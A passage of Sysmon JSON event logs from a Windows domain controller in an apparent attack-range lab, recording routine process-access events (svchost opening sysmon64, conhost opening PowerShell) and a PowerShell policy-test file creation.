{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4462,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4463,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4464,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4465,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4466,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4467,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-00104D890600}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-00104D890600}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4468,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.673\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-00104D890600}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.673","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-00104D890600}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4469,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.673\r\nProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nProcessId: 2608\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_o2aagge3.wje.ps1\r\nCreationUtcTime: 2020-08-01 07:58:52.673","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.673","ProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_o2aagge3.wje.ps1","CreationUtcTime":"2020-08-01 07:58:52.673","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4470,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.704\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: 